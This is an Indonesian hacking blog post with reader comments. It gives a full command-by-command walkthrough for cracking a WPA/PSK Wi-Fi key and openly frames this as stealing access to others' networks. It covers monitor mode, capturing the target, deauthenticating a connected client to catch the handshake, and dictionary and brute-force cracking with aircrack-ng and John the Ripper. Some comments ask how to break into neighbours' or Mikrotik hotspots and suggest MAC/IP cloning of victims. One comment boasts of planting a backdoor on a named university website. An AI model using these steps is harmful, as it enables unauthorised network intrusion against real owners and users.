Wireless Hacking – Cracking WPA / PSK Key

 
 04 May 2012 @ 11:49 AM 
BINUS HACKER Binus Hacker Is Not Criminal Banner

297
25
323

share

Selamat Hari Natal Semuanya! Merry Christmas BinusHacker Family

Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.

Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)

Download BackTrack 5 Disini:

Download BackTrack 5

Download Wordlist John The Ripper Disini:
Download Wordlist

Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install :)

Wireless Hacking Using BackTrack 5

Oke mari kita lanjutkan:

1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:

root@binushacker:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)

2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:


root@binushacker:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless

3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:

4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:


root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161

6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:00] 48 keys tested (489.60 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu: W!R3L3$$PWD

7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:22] 11484 keys tested (534.50 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD

Untuk lebih detailnya, silakan lihat video berikut:

  • Setelah Membaca, Ayo Berbagi:

  • facebook
  • twitter
  • yahoo_buzz
  • bookmark
  • email

Komentar

36 Komentar Untuk “Wireless Hacking – Cracking WPA / PSK Key
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. fast pro pada 25 December 2011 11:58 am

    weeeeeeih,

    ini akan sangat membantu para pengembang jg pecinta dunia maya,

    terima kasih buat seluruh kru binus hacker

    salam,

  2. newman pada 25 December 2011 5:14 pm

    klo yg pakai windows ada nggak?

  3. wongsoklowor pada 25 December 2011 10:57 pm

    kak binus hacker lo yang pake 098 area code.txt gimana?

  4. arif pada 26 December 2011 12:10 am

    aku takus kalo dual boot pke linux…soalnya dah pernah kejadian data ku ilang semua :D
    ada gk yang buat Windows

  5. arif pada 26 December 2011 12:11 am

    aku takut kalo dual boot pke linux…soalnya dah pernah kejadian data ku ilang semua :D
    ada gk yang buat Windows

  6. ewa pada 27 December 2011 8:50 am

    wahh .. pkee bactrack?? yg versi UBUNTU ada gk mas broo??

    newbii berkarrryaa //

  7. Josly pada 28 December 2011 12:41 am

    gan kalo make wordlist atau gak make wordlist pada saat pengumpulan paswwordnya waktunya sama gak 30 jam??

    kalau mau pakai wordlist apa bisa lebih cepat ya waktu mendapatkan passwordnya??

    makasih gan

  8. taufik pada 28 December 2011 9:15 pm

    kalau wifi samping rmh saya yg ada gambar konci and q pakai xp gimana caranya booss….

  9. 6110118 pada 29 December 2011 11:48 pm

    Tq gan.. lg nyari2 artikel kaya gini nih..

  10. wifi pada 30 December 2011 3:16 am

    Aduh,,,aduh,,, ngajar kog yg gak bgs sih mlh ngajar nyolong…

    Waktu ngehack itu pakai cara ini pasti lama… Apalg kalo password wifi tuh sepanjang kereta api n menggunakan simbol,huruf,angka…

    Kalo aq yg punya wifi aq blacklist mac kamu truz ganti Password alhasil silahkan coba lg… Untung2x gak didatangin truz di omelin…

    Mw yg aman n cepat mending tanya lansung pemilik warung hotspotnya…

  11. a_yodie pada 31 December 2011 3:43 pm

    Maaaantaaabss gan…!!!!!! kebetulan ane lagi nyari reference, blom ane coba sih kalo pake John

  12. Dutafirza pada 4 January 2012 11:22 pm

    coba gan

  13. Pangeran pada 11 January 2012 8:47 pm

    minta ijin kopas gan……………..

  14. semsul pada 15 January 2012 9:04 am

    boss cara install jhon gima carax?

  15. Kids pada 17 January 2012 3:34 am

    izin copadit .. :-)

  16. NT pada 28 January 2012 8:59 am

    waduh mantap gan…..
    maaf bru buka sibuk kerja ma kuliah gan….

  17. ikbal pada 30 January 2012 8:33 am

    ijin copas yc ms bisnus untuk pembelajran lebih lanjut. . ..

  18. tc pada 5 February 2012 12:01 am

    susah nih…
    nggak mengerti caranya…

  19. sandhi pada 5 February 2012 9:45 pm

    nice share gan

  20. reza pada 9 February 2012 7:32 am

    klu cara nghack pasword microtik dengan backtrack gmn ??

    cz bnyk wifi sekarang sistem keamananya udah berbasis microtik.

  21. malie pada 12 February 2012 12:53 am

    gan…ane punya koleksi wordlist, tapi ga ngerti cara mengguanakanya. ada gak solusi dari agan…?

    sebelumnya ane ucapkan terima kasih atas respon dari semua pihak

  22. ucuy pada 20 February 2012 12:59 pm

    om kok pas gw nyobain ni script : airmon-ng start wlan0

    Interface Chipset Driver

    shell nya gak ada reaksi apa apa diem trs,, kenapa yah maklum masih newbie nice info om

  23. Henry pada 21 February 2012 8:27 am

    Thanks Gan,,, Buat Trik Jhon The Riper (JTR) Sangat Membantu,,,

  24. yoga pada 25 February 2012 6:42 am

    kalo cuma mau liat password hotspot pke “wireless key view” cuma tinggal klik aja..

    ane mau tnya klo tuh hotspot di protek pke username sma password,,gmna jebolin nya??

  25. zaki pada 4 March 2012 3:36 am

    apakah menggunakan Mikrotik ?

    caranya adalah menggunakan metode clone ip .. kita samakan MAC address dan IP adress kita dengan MAC & IP address korban ..

    #Semoga membantu ! :)

  26. Blogadexme pada 6 March 2012 12:59 am

    mantap, q paling suka yang ini!
    nice info sobat, dan utk sobat2 yg lain para faceboker lihat disini
    Cara Update Status Facebook Via Sesuka Hati.
    semoga bermanfaat!

  27. shiaboxs pada 9 March 2012 1:23 pm

    hahahahahaha berhasil gan makasih tutor nya gan tanks banget gan hahahahahahahaha

  28. Masterloves pada 10 March 2012 7:06 am

    Selain backtrack silahkan pake black buntu
    eh gan ane tadi abis nanem backdor di http://semut.stmikayani.ac.id kayane tu admin kampus guoblok nya pol.. sasaran empuk tuh gan coba aja…

  29. tuyulz pada 16 March 2012 10:29 pm

    keren nih….sayang ga ada untuk windows…kalo ada share ya gan….:)

  30. amweb pada 30 March 2012 8:48 am

    maju terus binus hacker..jadikan lah teman2 terhadap situs ini sebagai ajang untuk belajar ..bukan untuk kejahatan

  31. anonymous pada 9 April 2012 8:21 pm

    kalo security typenya wpa 2 bisa ga ya?

  32. randa pada 10 April 2012 6:36 am

    waw keren

  33. Mistikerz pada 15 April 2012 10:37 pm

    Ane udah nginstall BT5 R2 GNOME dual boot ma Windows 7 tapi wirelessnya ko gak aktif ya??? padahal klo d Windows 7 gak ada masalah tuh…
    Laptop ane Compaq Presario CQ43 304au
    mohon bantuannya ya para MASTER coz ane baru bgt d linux
    Thx B4

  34. werox pada 25 April 2012 6:34 am

    gan , mau tanya , itu buat windows 7 bisa apa ngak ?
    soal nya bnyakyg suport buat linux , kalau ada yang bisa buat windows 7 , kasih tau gan , , , hehehe

    thx

  35. niko pada 27 April 2012 1:24 am

    Artikel ini sebaiknya jangan disebar. Orang Indonesia (apalagi para nubitol Indonesia) cenderung menggunakan artikel ini untuk tujuan kejahatan daripada manfaat kebaikan.

  36. RIdho6392 pada 28 April 2012 6:49 am

    ane pake VMware ko drivernya ga kedetek yah ??

Posted By: rijalajir
Last Edit: 04 May 2012 @ 11:49 AM

EmailPermalink
Tags
Categories: Uncategorized
Previous Next


 

Responses to this post » (None)

 
Post a Comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Tags
Comment Meta:
RSS Feed for comments
TrackBack URI
Last 50 Posts
Back
Register an account
Change Theme...
  • Users » 1
  • Posts/Pages » 111
  • Comments » 1
Change Theme...
  • VoidVoid « Default
  • LifeLife
  • EarthEarth
  • WindWind
  • WaterWater
  • FireFire
  • LightLight

About



    No Child Pages.

Systæm



    No Child Pages.

Hæck3r



    No Child Pages.

CömmænT



    No Child Pages.
Free Web Hosting